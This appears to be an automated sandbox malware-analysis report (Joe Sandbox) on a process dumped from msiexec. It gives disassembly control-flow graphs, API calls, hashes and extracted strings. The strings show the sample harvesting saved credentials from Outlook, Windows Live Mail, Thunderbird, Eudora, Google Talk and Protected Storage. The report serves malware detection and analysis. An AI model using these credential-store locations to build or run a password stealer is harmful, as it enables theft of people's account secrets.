calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                    APIs
                                                    • memset.MSVCRT ref: 0040832F
                                                    • memset.MSVCRT ref: 00408343
                                                    • memset.MSVCRT ref: 0040835F
                                                    • memset.MSVCRT ref: 00408376
                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                    • strlen.MSVCRT ref: 004083E9
                                                    • strlen.MSVCRT ref: 004083F8
                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                    • String ID: 5$H$O$b$i$}$}
                                                    • API String ID: 1832431107-3760989150
                                                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                    APIs
                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                    • strlen.MSVCRT ref: 00407F5C
                                                    • strlen.MSVCRT ref: 00407F64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileFindstrlen$FirstNext
                                                    • String ID: ACD
                                                    • API String ID: 379999529-620537770
                                                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                    Control-flow Graph

                                                    APIs
                                                    • memset.MSVCRT ref: 00401E8B
                                                    • strlen.MSVCRT ref: 00401EA4
                                                    • strlen.MSVCRT ref: 00401EB2
                                                    • strlen.MSVCRT ref: 00401EF8
                                                    • strlen.MSVCRT ref: 00401F06
                                                    • memset.MSVCRT ref: 00401FB1
                                                    • atoi.MSVCRT(?), ref: 00401FE0
                                                    • memset.MSVCRT ref: 00402003
                                                    • sprintf.MSVCRT ref: 00402030
                                                    • memset.MSVCRT ref: 00402086
                                                    • memset.MSVCRT ref: 0040209B
                                                    • strlen.MSVCRT ref: 004020A1
                                                    • strlen.MSVCRT ref: 004020AF
                                                    • strlen.MSVCRT ref: 004020E2
                                                    • strlen.MSVCRT ref: 004020F0
                                                    • memset.MSVCRT ref: 00402018
                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$`{ h$current$nss3.dll$sqlite3.dll
                                                    • API String ID: 3833278029-2252458523
                                                    • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                    • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                    • API String ID: 745651260-375988210
                                                    • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                    • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                    Strings
                                                    • pstorec.dll, xrefs: 00403C30
                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                    • API String ID: 1197458902-317895162
                                                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                    • String ID: kGu
                                                    • API String ID: 3662548030-4035606982
                                                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                    Control-flow Graph

                                                    APIs
                                                    • memset.MSVCRT ref: 0044430B
                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                    • memset.MSVCRT ref: 00444379
                                                    • memset.MSVCRT ref: 00444394
                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                    • strlen.MSVCRT ref: 004443DB
                                                    • _strcmpi.MSVCRT ref: 00444401
                                                    Strings
                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                    • Store Root, xrefs: 004443A5
                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                    • API String ID: 3203569119-2578778931
                                                    • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                    • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                    • String ID:
                                                    • API String ID: 2054149589-0
                                                    • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                    • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Cursor_mbsicmpqsort
                                                    • String ID: /nosort$/sort
                                                    • API String ID: 882979914-1578091866
                                                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 348 410dbb-410dd2 call 410d0e 351 410dd4-410ddd call 4070ae 348->351 352 410dfd-410e1b memset 348->352 359 410ddf-410de2 351->359 360 410dee-410df1 351->360 353 410e27-410e35 352->353 354 410e1d-410e20 352->354 357 410e45-410e4f call 410a9c 353->357 354->353 356 410e22-410e25 354->356 356->353 361 410e37-410e40 356->361 367 410e51-410e76 call 410d3d call 410add 357->367 368 410e7f-410e92 _mbscpy 357->368 359->352 363 410de4-410de7 359->363 366 410df8 360->366 361->357 363->352 365 410de9-410dec 363->365 365->352 365->360 369 410e95-410e97 366->369 367->368 368->369
                                                    APIs
                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                    • memset.MSVCRT ref: 00410E10
                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$`{ h
                                                    • API String ID: 119022999-3351821683
                                                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 374 4085d2-408605 call 44b090 call 4082cd call 410a9c 381 4086d8-4086dd 374->381 382 40860b-40863d memset call 410b62 374->382 385 4086c7-4086cc 382->385 386 408642-40865a call 410a9c 385->386 387 4086d2 385->387 390 4086b1-4086c2 call 410b62 386->390 391 40865c-4086ab memset call 410add call 40848b 386->391 387->381 390->385 391->390
                                                    APIs
                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                    • memset.MSVCRT ref: 00408620
                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                    • memset.MSVCRT ref: 00408671
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                    • String ID: Software\Google\Google Talk\Accounts$`{ h
                                                    • API String ID: 3996936265-23695026
                                                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                    Control-flow Graph

                                                    APIs
                                                    • memset.MSVCRT ref: 004109F7
                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                    • memset.MSVCRT ref: 00410A32
                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                    • String ID:
                                                    • API String ID: 3143880245-0
                                                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 407 44b33b-44b342 408 44b344-44b34a ??3@YAXPAX@Z 407->408 409 44b34b-44b352 407->409 408->409 410 44b354-44b35a ??3@YAXPAX@Z 409->410 411 44b35b-44b362 409->411 410->411 412 44b364-44b36a ??3@YAXPAX@Z 411->412 413 44b36b-44b372 411->413 412->413 414 44b374-44b37a ??3@YAXPAX@Z 413->414 415 44b37b 413->415 414->415
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                    APIs
                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: strlen$_strcmpimemset
                                                    • String ID: /stext
                                                    • API String ID: 520177685-3817206916
                                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                    APIs
                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
